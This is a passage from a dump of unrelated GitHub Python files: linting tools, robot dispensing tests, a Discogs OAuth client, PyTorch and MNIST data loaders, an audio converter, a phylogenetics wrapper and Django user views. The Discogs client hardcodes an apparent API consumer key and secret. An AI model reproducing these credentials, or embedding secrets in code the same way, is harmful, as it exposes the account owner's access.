CAM\n\t\trun_tracker(frame, bbox, False)\n\n\telif test == 'BenchMark':\n\t\t# test CNN model in tracker.py\n\t\t# AlexNet,GoogLeNet,VggNet, ResNet,DenseNet,WideResNet,ResNext,\n\t\t#SqueezeNet,MobileNet,ShuffleNet,MnasNet, SENet\n\t\ttruth_bbox = read_groundtruth(test_seq)\n\t\tframe = cv2.imread(test_seq+'img/0001.jpg')\n\t\trun_tracker(frame, truth_bbox, True)\n","repo_name":"Lupin1998/ADCF_2019","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"39985915698","text":"import argparse\nimport subprocess\nimport sys\nfrom pathlib import Path\nfrom typing import Any, Callable, List\n\nfrom colorama import Fore, Style, just_fix_windows_console\n\njust_fix_windows_console()\n\n\ndef print_color(*args: str, newline: bool = True) -> None:\n sys.stdout.write(\"\".join(args) + Style.RESET_ALL)\n if newline:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n\nclass CheckError(RuntimeError):\n def __init__(self, *args: object) -> None:\n super().__init__(*args)\n\n\ndef indent_text(text: str, indent: int) -> str:\n ind = \" \" * indent\n return \"\".join([(ind + line) for line in text.splitlines(keepends=True)])\n\n\ndef check(name: str) -> Callable:\n def wrapper(func: Callable) -> Callable:\n def decorate(*arg: Any, **kwargs: Any) -> Any:\n running_text = f\">>> Running {name}... 
\"\n print_color(Fore.CYAN, Style.BRIGHT, f\"{running_text}\", newline=False)\n sys.stdout.flush()\n try:\n retval = func(*arg, **kwargs)\n print_color(Fore.GREEN, \"PASSED.\")\n return retval\n except subprocess.CalledProcessError as e:\n\n print_color(Fore.RED, \"FAILED\")\n print_color(Fore.CYAN, \"Return code: \", Fore.RED, str(e.returncode))\n print_color(Fore.CYAN, \"Output:\")\n print(indent_text(e.stderr.decode(\"utf-8\"), 4), end=\"\")\n print(indent_text(e.stdout.decode(\"utf-8\"), 4), end=\"\")\n print()\n command = \" \".join(e.cmd)\n print_color(Fore.CYAN, \"Command:\")\n print(indent_text(command, 4))\n raise CheckError() from e\n\n return decorate\n\n return wrapper\n\n\n@check(\"black\")\ndef run_black(files: List[Path], fix: bool) -> None:\n args = [\"black\"]\n if not fix:\n args += [\"--check\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\n@check(\"autoflake\")\ndef run_autoflake(files: List[Path], fix: bool) -> None:\n args = [\"autoflake\", \"--remove-unused-variables\", \"--quiet\"]\n if fix:\n args += [\"--in-place\"]\n else:\n args += [\"--check-diff\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\n@check(\"isort\")\ndef run_isort(files: List[Path], fix: bool) -> None:\n args = [\"isort\", \"--color\"]\n if not fix:\n args += [\"--check-only\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\n@check(\"flake8\")\ndef run_flake8(files: List[Path], _: bool) -> None:\n args = [\"flake8\", \"--color\", \"always\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\n@check(\"mypy\")\ndef run_mypy(files: List[Path], _: bool) -> None:\n args = [\"mypy\", \"--color-output\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\ndef get_git_files() -> List[Path]:\n retval = []\n output = subprocess.check_output([\"git\", \"ls-files\"]).decode(\"utf-8\")\n for line in output.splitlines():\n p = Path(line)\n if not p.is_file():\n raise RuntimeError(f\"{p.as_posix()} is not a file. 
Hint: Stage your changes.\")\n retval.append(p)\n return retval\n\n\ndef get_py_files(files: List[Path]) -> List[Path]:\n return [f for f in files if f.suffix == \".py\"]\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--fix\", action=\"store_true\")\n args = parser.parse_args()\n\n all_files = get_git_files()\n py_files = get_py_files(all_files)\n print(f\"Found {len(py_files)} python files.\")\n\n py_checks = [run_black, run_autoflake, run_isort, run_flake8, run_mypy]\n fail = False\n for check in py_checks:\n try:\n check(py_files, args.fix)\n except CheckError as e:\n print(e)\n fail = True\n if fail:\n print_color(\"\\n\", Fore.CYAN, \"Hint: Try --fix to automatically format/fix code\")\n return 1\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"ownbee/doorstop-edit","sub_path":"tools/check_code.py","file_name":"check_code.py","file_ext":"py","file_size_in_byte":4087,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"42209448176","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport csv\nimport yaml\nimport time\nimport rospy\nimport pathlib\nimport numpy as np\n\nfrom datetime import datetime\n\nfrom motion.commander import RobotMoveGroup\nfrom dispense.dispense import Dispenser\n\n\nDISPENSE_HOME = [-1.2334, -2.2579, 2.1997, -2.6269, -0.3113, 2.6590]\nLOG_DIR = \"src/dispense/logs\"\n\nAUTOMATIC_RUN_MODE = True\n\n# Only for running in AUTOMATIC_RUN_MODE\nAVAILABLE_WEIGHT = 700\nREFILL_THREHOLD = 40\n\nINGREDIENT = \"peanuts\"\nMINIMUM_WEIGHT = 15\nMAXIMUM_WEIGHT = 120\nNUM_RUNS = 25\n\n\ndef acquire_input() -> float:\n \"\"\"\n Get weight to be dispensed from the user\n \"\"\"\n input_wt = input(\"Enter desired ingredient quantity (in grams). 
Enter -1 to stop: \")\n\n try:\n input_wt = float(input_wt)\n except ValueError:\n input_wt = -1.0\n\n return input_wt\n\n\ndef run(log_results=False):\n rospy.init_node(\"ur5e_dispense_test\")\n robot_mg = RobotMoveGroup()\n dispenser = Dispenser(robot_mg)\n num_runs = 0\n\n if log_results:\n if not os.path.exists(LOG_DIR):\n os.makedirs(LOG_DIR)\n log_file = \"{0}_eval_{1}.csv\".format(\n INGREDIENT, datetime.now().strftime(\"%b-%d--%H-%M-%S\")\n )\n out_file = open(LOG_DIR + \"/\" + log_file, \"w\")\n csv_writer = csv.writer(out_file)\n csv_writer.writerow([\"S.No\", \"Requested\", \"Dispensed\", \"Time Taken\"])\n\n # Load ingredient-specific params\n config_dir = pathlib.Path(__file__).parent.parent\n with open(config_dir / f\"config/ingredient_params/{INGREDIENT}.yaml\", \"r\") as f:\n params = yaml.safe_load(f)\n available_wt = AVAILABLE_WEIGHT\n\n while num_runs < NUM_RUNS:\n # Move to dispense-home position\n assert robot_mg.go_to_joint_state(\n DISPENSE_HOME, cartesian_path=True, velocity_scaling=0.15\n )\n if AUTOMATIC_RUN_MODE:\n requested_wt = np.random.uniform(low=MINIMUM_WEIGHT, high=MAXIMUM_WEIGHT)\n if (requested_wt + REFILL_THREHOLD > available_wt):\n usr_input = input(\"Refill Container and enter available weight (in grams): \")\n available_wt = float(usr_input)\n else:\n requested_wt = acquire_input()\n if requested_wt < 0 or requested_wt > 1000:\n break\n\n num_runs += 1\n\n # Dispense ingredient\n start_time = time.time()\n dispensed_wt = dispenser.dispense_ingredient(params, requested_wt)\n dispense_time = time.time() - start_time\n if AUTOMATIC_RUN_MODE:\n available_wt -= dispensed_wt\n\n if log_results:\n csv_writer.writerow(\n [num_runs, np.round(requested_wt, 2), np.round(dispensed_wt, 2), np.round(dispense_time, 1)]\n )\n out_file.flush()\n\n if log_results:\n out_file.close()\n\n\nif __name__ == \"__main__\":\n try:\n run(log_results=False)\n except rospy.ROSInterruptException:\n sys.exit(1)\n","repo_name":"ratatouille-robotics/dispense","sub_path":"test/test_dispense.py","file_name":"test_dispense.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36853529057","text":"# This code uses sample code from an example of how oauthflow works with discogs api\r\n# The code can be found at https://github.com/jesseward/discogs-oauth-example/blob/master/discogs_example.py\r\n# Thank you to Jesse Ward for this example\r\nimport json\r\nimport sys\r\n\r\nfrom urllib import request\r\nfrom urllib.parse import parse_qsl\r\nfrom urllib.parse import urlparse\r\n\r\nimport oauth2 as oauth\r\n\r\nclass Discord:\r\n\r\n def __init__(self):\r\n self.consumer_key = 'JJCOegYnRLCLRejtcZbo'\r\n self.consumer_secret = 'UFlGrCViqSkoBNfRTGZyUfmpTGNbFbMM'\r\n\r\n self.request_token_url = 'https://api.discogs.com/oauth/request_token'\r\n self.authorize_url = 'https://www.discogs.com/oauth/authorize'\r\n self.access_token_url = 'https://api.discogs.com/oauth/access_token'\r\n\r\n self.user_agent = 'discogs_api_example/1.0'\r\n self.user_name = None\r\n self.oauth_token = None\r\n self.oauth_token_secret = None\r\n\r\n def get_token(self):\r\n # create oauth Consumer and Client objects using\r\n consumer = oauth.Consumer(self.consumer_key, self.consumer_secret)\r\n client = oauth.Client(consumer)\r\n\r\n # pass in your consumer key and secret to the token request URL. 
Discogs returns\r\n # an ouath_request_token as well as an oauth request_token secret.\r\n resp, content = client.request(self.request_token_url, 'POST', headers={'User-Agent': self.user_agent})\r\n\r\n # we terminate if the discogs api does not return an HTTP 200 OK. Something is\r\n # wrong.\r\n if resp['status'] != '200':\r\n sys.exit('Invalid response {0}.'.format(resp['status']))\r\n\r\n request_token = dict(parse_qsl(content.decode('utf-8')))\r\n\r\n print(' == Request Token == ')\r\n print(f' * oauth_token = {request_token[\"oauth_token\"]}')\r\n print(f' * oauth_token_secret = {request_token[\"oauth_token_secret\"]}')\r\n print()\r\n\r\n # Authorize our newly received request_token against the discogs oauth endpoint.\r\n # Prompt your user to \"accept\" the terms of your application. The application\r\n # will act on behalf of their discogs.com account.\r\n # If the user accepts, discogs displays a key to the user that is used for\r\n # verification. The key is required in the 2nd phase of authentication.\r\n print(f'Please browse to the following URL {self.authorize_url}?oauth_token={request_token[\"oauth_token\"]}')\r\n\r\n # Waiting for user input\r\n accepted = 'n'\r\n while accepted.lower() == 'n':\r\n print()\r\n accepted = input(\r\n f'Have you authorized me at {self.authorize_url}?oauth_token={request_token[\"oauth_token\"]} [y/n] :')\r\n\r\n # request the verification token from the user.\r\n oauth_verifier = input('Verification code : ')\r\n\r\n # Generate objects that pass the verification key with the oauth token and oauth\r\n # secret to the discogs access_token_url\r\n token = oauth.Token(request_token['oauth_token'], request_token['oauth_token_secret'])\r\n token.set_verifier(oauth_verifier)\r\n client = oauth.Client(consumer, token)\r\n\r\n resp, content = client.request(self.access_token_url, 'POST', headers={'User-Agent': self.user_agent})\r\n\r\n # if verification is successful, the discogs oauth API will return an access token\r\n # and access token secret. This is the final authentication phase. You should persist\r\n # the oauth_token and the oauth_token_secret to disk, database or some\r\n # other local store. All further requests to the discogs.com API that require authentication\r\n # and must be made with these access_tokens.\r\n access_token = dict(parse_qsl(content.decode('utf-8')))\r\n\r\n print(' == Access Token ==')\r\n print(f' * oauth_token = {access_token[\"oauth_token\"]}')\r\n print(f' * oauth_token_secret = {access_token[\"oauth_token_secret\"]}')\r\n print(' Authentication complete. 
Future requests must be signed with the above tokens.')\r\n print()\r\n\r\n # We're now able to fetch an image using the application consumer key and secret,\r\n # along with the verified oauth token and oauth token for this user.\r\n\r\n self.oauth_token = access_token['oauth_token']\r\n self.oauth_token_secret = access_token['oauth_token_secret']\r\n return request_token['oauth_token'], request_token['oauth_token_secret']\r\n\r\n\r\n# We're now able to fetch an image using the application consumer key and secret,\r\n# along with the verified oauth token and oauth token for this user.\r\n def get_collection(self):\r\n consumer = oauth.Consumer(self.consumer_key, self.consumer_secret)\r\n token = oauth.Token(key=self.oauth_token, secret=self.oauth_token_secret)\r\n client = oauth.Client(consumer, token)\r\n\r\n resp, content = client.request('https://api.discogs.com/oauth/identity', headers={'User-Agents': self.user_agent})\r\n print(content)\r\n user = json.loads(content.decode('utf-8'))\r\n print(user)\r\n # With an active auth token, we're able to reuse the client object and request\r\n # additional discogs authenticated endpoints, such as database search.\r\n username = user['username']\r\n resp, content = client.request(f'https://api.discogs.com/users/{username}/collection/folders',\r\n headers={'User-Agents': self.user_agent})\r\n\r\n if resp['status'] != '200':\r\n sys.exit('Invalid API response {0}.'.format(resp['status']))\r\n\r\n collection = json.loads(content.decode('utf-8'))\r\n return collection, username\r\n\r\n\r\n def select_collection_and_get_albums(self, collection, username):\r\n consumer = oauth.Consumer(self.consumer_key, self.consumer_secret)\r\n token = oauth.Token(key=self.oauth_token, secret=self.oauth_token_secret)\r\n client = oauth.Client(consumer, token)\r\n users_collection = []\r\n i = 0\r\n for x in collection['folders']:\r\n print(i, x['name'], \"count: \" + str(x['count']))\r\n users_collection.append(x['id'])\r\n i+=1\r\n\r\n selection = input(\"please enter the index of which folder you would like to select: \")\r\n folder_id = users_collection[int(selection)]\r\n\r\n resp, content = client.request(f'https://api.discogs.com/users/{username}/collection/folders/{folder_id}/releases',\r\n headers={'User-Agents': self.user_agent})\r\n\r\n if resp['status'] != '200':\r\n sys.exit('Invalid API response {0}.'.format(resp['status']))\r\n\r\n content = json.loads(content)\r\n\r\n releases = content.get(\"releases\")\r\n\r\n num_pages = content.get(\"pagination\").get(\"pages\")\r\n if num_pages > 1:\r\n i = 1\r\n while i < num_pages:\r\n next_url = content.get(\"pagination\").get(\"urls\").get(\"next\")\r\n print(next_url)\r\n resp, content = client.request(next_url,\r\n headers={'User-Agents': self.user_agent})\r\n if resp['status'] == '200':\r\n content = json.loads(content)\r\n releases.append(content.get(\"releases\"))\r\n else:\r\n break\r\n i+=1\r\n\r\n print(releases)\r\n","repo_name":"Max585t/Discogs2Spotify","sub_path":"discogs.py","file_name":"discogs.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11448017832","text":"import numpy as np\nimport torch\nfrom torch.utils.data import DataLoader, SubsetRandomSampler\n\n\ndef make_dataloaders(dataset, train_batch_size=1, val_batch_size=1, validation_split=0.1, shuffle_dataset=True):\n random_seed = 42\n\n dataset_size = len(dataset)\n indices = list(range(dataset_size))\n split = 
int(np.floor(validation_split * dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices, val_indices = indices[split:], indices[:split]\n\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n\n train_dataloader = torch.utils.data.DataLoader(dataset, batch_size=train_batch_size,\n sampler=train_sampler)\n validation_dataloader = torch.utils.data.DataLoader(dataset, batch_size=val_batch_size,\n sampler=valid_sampler)\n return train_dataloader, validation_dataloader\n","repo_name":"iolkhovsky/ssd_detector","sub_path":"pascal_voc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3221806748","text":"import os\nfrom pydub import AudioSegment\n\n# Define paths to MP3 files\nmp3_dir = \"C:/Users/Yasiru/Downloads/wav2vec2 datasets\"\nwav_dir = \"C:/Users/Yasiru/Downloads/wav2vec2 datasets/wav\"\n\n\n# Create output directory if it doesn't exist\nos.makedirs(wav_dir, exist_ok=True)\n\n# Set audio parameters\nsample_rate = 16000\nchannels = 1\n\n# Process each MP3 file\nfor filename in os.listdir(mp3_dir):\n if filename.endswith(\".mp3\"):\n # Load MP3 file\n mp3_path = os.path.join(mp3_dir, filename)\n sound = AudioSegment.from_mp3(mp3_path)\n\n # Set channels and sample rate\n sound = sound.set_channels(channels)\n sound = sound.set_frame_rate(sample_rate)\n\n # Generate filename for WAV file\n basename = os.path.splitext(filename)[0]\n wav_filename = f\"{basename}.wav\"\n wav_path = os.path.join(wav_dir, wav_filename)\n\n # Export as WAV file\n sound.export(wav_path, format=\"wav\")\n\n","repo_name":"YasiruRuwantha/SpeakLing-SDGP","sub_path":"deepLearningModel/training-notebooks-and-python-scripts/convertmp3towav.py","file_name":"convertmp3towav.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29023321124","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nPhylogenetic reconstruction via the qjoin commandline program.\n\"\"\"\n\n__docformat__ = 'restructuredtext en'\n\n\n### IMPORTS ###\n\nimport os\n\nfrom Bio import AlignIO\n\nimport clineapp\nimport scratchfile\n\n\n__all__ = [\n\t'QJoinCline',\n]\n\n\n## CONSTANTS & DEFINES ###\n\nINALIGN_NAME = 'in.sth'\nOUTTREE_NAME = 'out.txt'\n\n\n### IMPLEMENTATION ###\n\nclass QjoinCline (clineapp.ClineApp):\n\t\"\"\"\n\tA class for calling qjoin for phylogenetic reconstruction.\n\t\n\t\"\"\"\n\tdef __init__ (self, exepath='/usr/local/bin/qjoin'):\n\t\tclineapp.ClineApp.__init__ (self, exepath, use_workdir=True,\n\t\t\tremove_workdir=False, check_requirements=False)\n\t\t\t\n\tdef setup_workdir (self):\n\t\t\"\"\"\n\t\tPrepare the necessary input files for Qjoin.\n\n\t\tThis creates a temporary working area, and writes input alignment\n\t\tfiles.\n\n\t\t\"\"\"\n\t\t## Preconditions & preparations:\n\t\t## Main:\n\t\t# create workdir and filepaths\n\t\tclineapp.ClineApp.setup_workdir (self)\n\t\tself._inalign_path = scratchfile.make_scratch_file (INALIGN_NAME,\n\t\t\tself._curr_workdir)\n\t\t# write infile workfile\n\t\t#MSG (self._curr_workdir, self._inalign_path)\n\t\tinfile_hndl = open (self._inalign_path, 'w')\n\t\tAlignIO.write ([self._in_align], infile_hndl, 'stockholm')\n\n\tdef run (self, align, num_bootstraps=0):\n\t\t\"\"\"\n\t\tRun Qjoin to reconstruct a tree from an 
alignment.\n\n\t\t:Params:\n\t\t\talign : Biopython alignment\n\t\t\t\tThe sequence alignment to be built into a tree.\n\t\t\tnum_bootstraps : integer or False\n\t\t\t\tThe number of bootstraps to run. If False (the default), no\n\t\t\t\tbootstraps are done.\n\n\t\t\"\"\"\n\t\t## Preconditions & preparation:\n\t\tself.set_input_alignment (align)\n\t\t## Main:\n\t\tcmdopts = [\n\t\t\tINALIGN_NAME,\n\t\t\tOUTTREE_NAME,\n\t\t]\n\t\t#if (num_bootstraps):\n\t\t#\tcmdopts.append ('--bootstrap=%s' % num_bootstraps)\n\t\t\n\t\tself.call_cmdline (*cmdopts)\n\t\t\n\tdef extract_results (self):\n\t\t\"\"\"\n\t\tObtain the output produced by Qjoin.\n\n\t\tWe call this as a separate function, so the caller has a chance to\n\t\tcheck the status and error output first.\n\t\t\n\t\t:Returns:\n\t\t\tAn ete2 tree object, containing both branch lengths and supports.\n\t\t\n\t\t\"\"\"\n\t\t## Preconditions:\n\t\t# make sure that cline has actually run & output exists\n\t\tassert (self._curr_cline)\n\t\toutput_path = os.path.join (self._curr_workdir, OUTTREE_NAME)\n\t\tassert (os.path.exists (output_path)), \\\n\t\t\t\"can't find outfile %s\" % output_path\n\t\t## Main:\n\t\t# extract the data\n\t\toutput_hndl = open (output_path, 'rU')\n\t\ttree_str = output_hndl.read()\n\t\toutput_hndl.close()\n\n\t\t# split the two trees\n\t\ttmp_list = tree_str.split('\\n\\n')\n\t\tsupport_tree_str = tmp_list[1].split(':', 1)[1].strip()\n\t\tdist_tree_str = tmp_list[0].split(':', 1)[1].strip()\n\n\t\t# convert to ete form and merge\n\t\timport ete2\n\n\t\tdist_tree = ete2.Tree (dist_tree_str)\n\t\tsupport_tree = ete2.Tree (support_tree_str)\n\n\t\tdist_nodes = [n for n in dist_tree.traverse (\"postorder\")]\n\t\tsupport_nodes = [n for n in support_tree.traverse (\"postorder\")]\n\n\t\tfor i in range (len (dist_nodes)):\n\t\t\td_node = dist_nodes[i]\n\t\t\ts_node = support_nodes[i]\n\t\t\td_node.support = s_node.support\n
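\n\t\t# NOTE: this index-wise copy assumes both output trees share one topology,\n\t\t# so a postorder traversal visits corresponding nodes in the same order.\n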
\n\t\t## Postconditions:\n\t\treturn dist_tree\n\t\t\t\n\t\t\t\n\tdef set_input_alignment (self, align):\n\t\t\"\"\"\n\t\tRecord the input alignment as a series of SeqRecords.\n\n\t\tThis is necessary since the IO functions expect a series of SeqRecords.\n\t\tThis should be called from the ``run`` command for each class to\n\t\tconvert the input data. It stores the result on the member\n\t\t``_in_align``.\n\n\t\t:Params:\n\t\t\talign\n\t\t\t\tEither a BioPython alignment or a sequence of BioPython SeqRecords.\n\n\t\t\"\"\"\n\t\tself._in_align = align\n\t\t\t\n\t\t\t\n\n### TEST & DEBUG ###\n\ndef _doctest ():\n\timport doctest\n\tdoctest.testmod ()\n\n\n### MAIN ###\n\nif __name__ == '__main__':\n\t_doctest()\n\n\n### END ######################################################################\n","repo_name":"agapow/fish-path-seqmatcher","sub_path":"analysis/qjoincline.py","file_name":"qjoincline.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"17974124608","text":"import gzip\nimport numpy as np\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader, Dataset\nimport torch.utils.data as data\n\n'''\nThis file has all the data loaders used in various experiments.\n'''\ntransform = transforms.Compose(\n    [transforms.ToPILImage(),\n     transforms.ToTensor(),\n     # transforms.Normalize((0.5, ), (0.5, ))\n     ])\n\n\nclass MNISTDataset(Dataset):\n    def __init__(self, images, labels=None, transforms=None):\n        self.X = images\n        self.y = labels\n        self.transforms = transforms\n\n    def __len__(self):\n        return (len(self.X))\n\n    def __getitem__(self, i):\n        data = self.X[i]\n        data = np.asarray(data)\n\n        if self.transforms:\n            data = self.transforms(data)\n\n        if self.y is not None:\n            return (data.float(), self.y[i])\n        else:\n            return data.float()\n\n\nclass TensorDataset(Dataset):\n    def __init__(self, tensors, labels=None):\n        # tensors = torch.reshape(tensors, (len(tensors), 1, 24, 24))\n        # print(tensors.shape)\n        self.X = tensors\n        self.y = labels\n\n    def __len__(self):\n        return (len(self.X))\n\n    def __getitem__(self, i):\n        data = self.X[i]\n        # data = np.asarray(data)\n\n        # data = transform(data)\n        # print(\"Inside tensor loader\", data.shape)\n\n        if self.y is not None:\n            return (data.float(), self.y[i])\n        else:\n            return data.float()\n\n    def append(self, tensors, labels):\n        # tensors = torch.reshape(tensors, (len(tensors), 1, 24, 24))\n        # print(tensors.shape)\n        if self.X is None:\n            self.X = tensors\n            self.y = labels\n        else:\n            self.X = torch.cat((self.X, tensors), 0)\n            self.y = torch.cat((self.y, labels), 0)\n\n\nclass FeatureDataset(Dataset):\n    def __init__(self, images, labels=None, transforms=None):\n        self.X = images\n        self.y = labels\n        self.transforms = transforms\n\n    def __len__(self):\n        return (len(self.X))\n\n    def __getitem__(self, i):\n        data = self.X[i]\n        data = np.asarray(data)\n\n        if self.y is not None:\n            return (data, self.y[i])\n        else:\n            return data\n\n\nclass Train_Val_Loader:\n\n    def __init__(self):\n        pass\n\n    @staticmethod  # no instance state needed; call as Train_Val_Loader.load_train_dataset(...)\n    def load_train_dataset(datapath, labelpath, batch_size, shuffle=True):\n        file_reader = gzip.open(datapath, 'r')\n        file_reader.read(16)\n        buf = file_reader.read(28 * 28 * 60000)\n        train_data_images = np.frombuffer(buf, dtype=np.uint8).astype(np.int32)\n        train_data_images = np.reshape(train_data_images, (60000, 28, 28))\n        file_reader = gzip.open(labelpath, 'r')\n        buf = file_reader.read()\n        train_label = np.frombuffer(buf, dtype=np.uint8, offset=8)\n\n        train_data = MNISTDataset(train_data_images, train_label, transform)\n        train_set, validation_set = data.random_split(train_data, [50000, 10000])\n\n        train_loader = DataLoader(train_set, batch_size, shuffle=True, drop_last=True)\n        validation_loader = DataLoader(validation_set, batch_size, shuffle=True, drop_last=True)\n        return train_loader, validation_loader\n
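\n# Example usage (hypothetical MNIST idx gzip paths):\n#   train_loader, val_loader = Train_Val_Loader.load_train_dataset(\n#       \"train-images-idx3-ubyte.gz\", \"train-labels-idx1-ubyte.gz\", batch_size=64)\n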
train_loader, validation_loader\n\n\nclass Train_Loader:\n def __init__(self):\n self\n\n def load_train_dataset(datapath, labelpath, batch_size, shuffle=True):\n file_reader = gzip.open(datapath, 'r')\n file_reader.read(16)\n buf = file_reader.read(28 * 28 * 60000)\n train_data_images = np.frombuffer(buf, dtype=np.uint8).astype(np.int32)\n train_data_images = np.reshape(train_data_images, (60000, 28, 28))\n\n file_reader = gzip.open(labelpath, 'r')\n buf = file_reader.read()\n train_label = np.frombuffer(buf, dtype=np.uint8, offset=8)\n\n train_data = MNISTDataset(train_data_images, train_label, transform)\n\n train_loader = DataLoader(train_data, batch_size, shuffle=True, drop_last=False)\n return train_loader\n\n\nclass Test_Loader:\n def __init__(self):\n self\n\n def load_test_dataset(datapath, labelpath, batch_size, shuffle=True):\n file_reader = gzip.open(datapath, 'r')\n file_reader.read(16)\n buf = file_reader.read(28 * 28 * 10000)\n test_data_images = np.frombuffer(buf, dtype=np.uint8).astype(np.int32)\n test_data_images = np.reshape(test_data_images, (10000, 28, 28))\n\n file_reader = gzip.open(labelpath, 'r')\n buf = file_reader.read()\n test_label = np.frombuffer(buf, dtype=np.uint8, offset=8)\n\n test_data = MNISTDataset(test_data_images, test_label, transform)\n\n test_loader = DataLoader(test_data, batch_size, shuffle=True, drop_last=False)\n return test_loader\n\n\nclass FashionMNISTLoader:\n def __init__(self):\n self\n\n def load_test_and_trainset(self, batch_size, shuffle=True):\n T = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor()\n ])\n train_data = torchvision.datasets.FashionMNIST(\"./data/mnist/train_data\", train=True, download=True,\n transform=T)\n test_data = torchvision.datasets.FashionMNIST(\"./data/mnist/test_data\", train=False, download=True, transform=T)\n\n train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)\n test_loader = DataLoader(test_data, batch_size=batch_size, shuffle=shuffle)\n return train_loader, test_loader\n\n\nclass PerturbImageLoader:\n def __init__(self, tensor_dataset):\n self.tensor_dataset = tensor_dataset\n\n def get(self, batch_size, shuffle=True):\n perturb_image_loader = DataLoader(self.tensor_dataset, batch_size, shuffle)\n return perturb_image_loader\n\n\nclass Feature_loader:\n def __init__(self):\n self\n\n def create_feature_loader(train_images, train_labels, batch_size, shuffle=True):\n feature_data = FeatureDataset(train_images, train_labels)\n feature_loader = DataLoader(feature_data, batch_size, shuffle)\n return feature_loader\n","repo_name":"mayankanand111/FeatureSleuth","sub_path":"DataLoader/Loader.py","file_name":"Loader.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3358278604","text":"from .models import User\nfrom .serializers import UserSerializer, CustomJWTSerializer, TokenObtainPairSerializer\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework.generics import CreateAPIView, RetrieveUpdateDestroyAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom .permissions import IsOwnerUserPermission\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom drf_spectacular.utils import extend_schema\n\n\nclass LoginJWTView(TokenObtainPairView):\n serializer_class = CustomJWTSerializer\n\n @extend_schema(\n operation_id=\"api_users_login_create\", # (1) # 
(2)\n description=\"Route to login of users. Must be registered to get the expected return.\",\n summary=\"User login\",\n tags=[\"Login\"],\n responses={200: TokenObtainPairSerializer},\n )\n def post(self, request, *args, **kwargs):\n return super().post(request, *args, **kwargs)\n\n\nclass UserView(CreateAPIView):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n @extend_schema(\n operation_id=\"api_users_create\", # (1) # (2)\n description=\"Route for creating users and defining their permission level.\",\n summary=\"User create\",\n tags=[\"Users\"],\n )\n def post(self, request, *args, **kwargs):\n return super().post(request, *args, **kwargs)\n\n\nclass UserDetailView(RetrieveUpdateDestroyAPIView):\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticated, IsOwnerUserPermission]\n\n queryset = User.objects.all()\n serializer_class = UserSerializer\n lookup_url_kwarg = \"user_id\"\n\n @extend_schema(\n operation_id=\"api_users_retrieve\", # (1) # (2)\n description=\"Route to return data from a single user. Must be admin or owner to be able to do the search.\",\n summary=\"Retrieve data from a user 🔐\",\n tags=[\"Users\"],\n )\n def get(self, request, *args, **kwargs):\n return super().get(request, *args, **kwargs)\n\n @extend_schema(\n operation_id=\"api_users_partial_update\", # (1) # (2)\n description=\"Route to update a user's data. Must be admin or the owner to be able to do the request.\",\n summary=\"User data update 🔐\",\n tags=[\"Users\"],\n )\n def patch(self, request, *args, **kwargs):\n return super().patch(request, *args, **kwargs)\n\n @extend_schema(\n operation_id=\"api_users_destroy\", # (1) # (2)\n description=\"Route to delete a user's data. Must be admin or the owner to be able to do the request.\",\n summary=\"User data delete 🔐\",\n tags=[\"Users\"],\n responses={204: None},\n )\n def delete(self, request, *args, **kwargs):\n return super().delete(request, *args, **kwargs)\n\n @extend_schema(\n operation_id=\"api_users_update\", # (1) # (2)\n description=\"Route to update a user completely. 
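Each verb override in this views module exists only to attach schema metadata; the behavior stays in the generic view. A minimal sketch of the same pattern on a hypothetical list view, assuming drf-spectacular is installed (Widget and WidgetSerializer are stand-ins, not part of the original):

```python
from drf_spectacular.utils import extend_schema
from rest_framework.generics import ListAPIView

from .models import Widget                  # hypothetical model
from .serializers import WidgetSerializer   # hypothetical serializer

class WidgetListView(ListAPIView):
    queryset = Widget.objects.all()
    serializer_class = WidgetSerializer

    @extend_schema(
        operation_id="api_widgets_list",
        description="Route that lists all widgets.",
        summary="Widget list",
        tags=["Widgets"],
    )
    def get(self, request, *args, **kwargs):
        # The decorator only changes the generated OpenAPI document;
        # delegating to super() keeps the stock list behavior.
        return super().get(request, *args, **kwargs)
```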
